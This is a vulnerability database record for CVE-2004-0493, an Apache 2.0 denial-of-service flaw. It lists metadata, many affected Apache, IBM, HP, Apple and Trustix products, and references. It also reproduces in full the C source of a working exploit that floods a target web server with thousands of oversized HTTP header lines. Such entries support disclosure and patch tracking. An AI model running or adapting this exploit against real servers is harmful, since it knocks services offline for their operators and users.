Details of VAR-E-200406-0043

ID

VAR-E-200406-0043

CVE

cve_id:

CVE-2004-0493

Trust: 1.9

sources: BID: 10619 // EXPLOIT-DB: 371 // EDBNET: 25045

EDB ID

371

TITLE

Apache - Arbitrary Long HTTP Headers Denial of Service (C) - Linux dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 371

DESCRIPTION

Apache - Arbitrary Long HTTP Headers Denial of Service (C). CVE-7269CVE-2004-0493 . dos exploit for Linux platform

Trust: 0.6

sources: EXPLOIT-DB: 371

AFFECTED PRODUCTS

vendor:	apache	model:	-	scope:	-	version:	-	Trust: 1.0
vendor:	apache	model:	httpd	scope:	-	version:	-	Trust: 0.6
vendor:	trustix	model:	secure linux	scope:	eq	version:	2.1	Trust: 0.3
vendor:	trustix	model:	secure linux	scope:	eq	version:	2.0	Trust: 0.3
vendor:	trustix	model:	secure linux	scope:	eq	version:	1.5	Trust: 0.3
vendor:	trustix	model:	secure enterprise linux	scope:	eq	version:	2.0	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	2.0.47.1	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	2.0.47	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	2.0.42.2	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	2.0.42.1	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	2.0.42	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.23	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.22	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.11	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.00	scope:	-	version:	-	Trust: 0.3
vendor:	gentoo	model:	linux	scope:	eq	version:	1.4	Trust: 0.3
vendor:	avaya	model:	s8700 r2.0.0	scope:	-	version:	-	Trust: 0.3
vendor:	avaya	model:	s8500 r2.0.0	scope:	-	version:	-	Trust: 0.3
vendor:	avaya	model:	s8300 r2.0.0	scope:	-	version:	-	Trust: 0.3
vendor:	avaya	model:	converged communications server	scope:	eq	version:	2.0	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.3.5	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.3.4	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.2.8	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.3.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.2.8	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.49	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.48	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.47	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.46	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.45	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.44	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.43	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.42	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.41	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.40	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.39	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.38	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.37	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.36	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.35	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.32	Trust: 0.3
vendor:	apache	model:	beta	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	a9	scope:	eq	version:	2.0	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	2.0.50	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.31	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.29	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.28	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.27	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.26	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.25	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.24	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.23	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.22	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.20	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.19	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.18	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.17	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.14	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.12	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.11	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.9	Trust: 0.3
vendor:	apache	model:	-dev	scope:	ne	version:	1.3.7	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.6	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.4	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.3	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3.1	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	1.3	Trust: 0.3

sources: BID: 10619 // EXPLOIT-DB: 371 // EDBNET: 25045

EXPLOIT

#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>

#define A 0x41
#define PORT 80

struct sockaddr_in hrm;

int conn(char *ip)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(PORT);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr)))<0)
{
perror("connect");
exit(0);
}
return sockfd;
}
int main(int argc, char *argv[])
{
int i,x;
char buf[300],a1[8132],a2[50],host[100],content[100];
char *ip=argv[1],*new=malloc(sizeof(int));
sprintf(new,"\r\n");
memset(a1,'\0',8132);
memset(host,'\0',100);
memset(content,'\0',100);
a1[0] = ' ';
for(i=1;i<8132;i++)
a1[i] = A;
if(argc<2)
{
printf("%s: IP\n",argv[0]);
exit(0);
}
x = conn(ip);
printf("[x] Connected to: %s.\n",inet_ntoa(hrm.sin_addr));
sprintf(host,"Host: %s\r\n",argv[1]);
sprintf(content,"Content-Length: 50\r\n");
sprintf(buf,"GET / HTTP/1.0\r\n");
write(x,buf,strlen(buf));
printf("[x] Sending buffer...");
for(i=0;i<2000;i++)
{
write(x,a1,strlen(a1));
write(x,new,strlen(new));
}
memset(buf,'\0',300);
strcpy(buf,host);
strcat(buf,content);
for(i=0;i<50;i++)
a2[i] = A;
strcat(buf,a2);
strcat(buf,"\r\n\r\n");
write(x,buf,strlen(buf));
printf("done!\n");
close(x);

}

// milw0rm.com [2004-08-02]

Trust: 1.0

sources: EXPLOIT-DB: 371

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 371

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 371

TYPE

Arbitrary Long HTTP Headers Denial of Service (C)

Trust: 1.0

sources: EXPLOIT-DB: 371

CREDITS

anonymous

Trust: 0.6

sources: EXPLOIT-DB: 371

EXTERNAL IDS

db:	NVD	id:	CVE-2004-0493	Trust: 1.9
db:	EXPLOIT-DB	id:	371	Trust: 1.6
db:	EDBNET	id:	25045	Trust: 0.6
db:	BID	id:	10619	Trust: 0.3

sources: BID: 10619 // EXPLOIT-DB: 371 // EDBNET: 25045

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2004-0493	Trust: 1.6
url:	https://www.exploit-db.com/exploits/371/	Trust: 0.6
url:	http://rhn.redhat.com/errata/rhsa-2004-342.html	Trust: 0.3
url:	http://www-1.ibm.com/support/docview.wss?rs=177&context=sseqtj&uid=swg21174271&loc=en_us&cs=utf-8&lang=en+en	Trust: 0.3
url:	http://httpd.apache.org/	Trust: 0.3

sources: BID: 10619 // EXPLOIT-DB: 371 // EDBNET: 25045

SOURCES

db:	BID	id:	10619
db:	EXPLOIT-DB	id:	371
db:	EDBNET	id:	25045

LAST UPDATE DATE

2022-07-27T09:17:45.849000+00:00

SOURCES UPDATE DATE

db:

BID

id:

10619

date:

2010-08-05T19:46:00

SOURCES RELEASE DATE

db:	BID	id:	10619	date:	2004-06-28T00:00:00
db:	EXPLOIT-DB	id:	371	date:	2004-08-02T00:00:00
db:	EDBNET	id:	25045	date:	2004-08-02T00:00:00